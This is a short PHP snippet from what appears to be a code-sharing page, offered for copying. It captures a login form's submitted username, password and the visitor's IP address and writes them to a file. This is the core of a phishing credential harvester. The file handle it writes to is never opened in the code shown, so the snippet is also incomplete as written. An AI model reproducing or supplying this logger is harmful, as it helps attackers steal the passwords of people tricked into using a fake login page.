/ Published in: PHP
Expand |
Embed | Plain Text
Copy this code and paste it in your HTML
<?php $Account = $_POST['login-username']; $Password = $_POST['login-password']; $IP = $_SERVER['REMOTE_ADDR']; fwrite ($f, 'User: <b>['.$Account.']</b> Password: <b>['.$Password.']</b> IP: <b>['.$IP.']<b/><br>'); ?>